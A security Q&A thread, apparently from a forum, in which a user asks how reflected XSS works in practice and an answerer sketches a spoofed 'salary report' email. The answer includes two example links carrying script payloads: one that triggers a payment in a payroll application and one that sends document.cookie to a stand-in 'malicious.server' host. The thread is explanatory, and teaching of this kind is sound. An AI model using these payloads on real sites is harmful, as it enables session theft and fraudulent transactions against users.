# Can someone give me a real scenario for reflective xss?

Tags: xss

I am researching XSS and trying to understand different types of XSS.
Most documents talk about what they are and try to explain with a simple example.I have understood stored XSS quite well.

What I don't understand is reflected XSS and how its done in a real world scenario.Most explanations just talk about injecting malicious code which gets embedded on the page a user visits by clicking a malicious link.But I don't understand how and why they would click such a link in the first place.

If any of you can share a real world example for reflective XSS,it would really be helpful.

Answer (score 0):

"Hi midhun lc,

I created the salary report you asked for, find it [here].

Regards,
Your assistant"

[here] is a link that points to `https://payrollapplication/reportid=<script>$.post('https://payrollapplication/send_payment?amount=5000&to=assistant')</script>` (Obviously this also exploits CSRF.)

Or [here] is a link that points to `https://payrollapplication/reportid=<script>$.post('malicious.server/?receive=' + document.cookie)</script>` to steal session and other cookies. (This also exploits weak cookie flags.)

Or it can just send any data from the payrollapplication that the victim can access.

And so on. How exactly the payload gets to the victim may vary of course. It can be in an internal doc, sent in an email, etc.

Comment: that actually makes sense.Thanks a lot Gabor.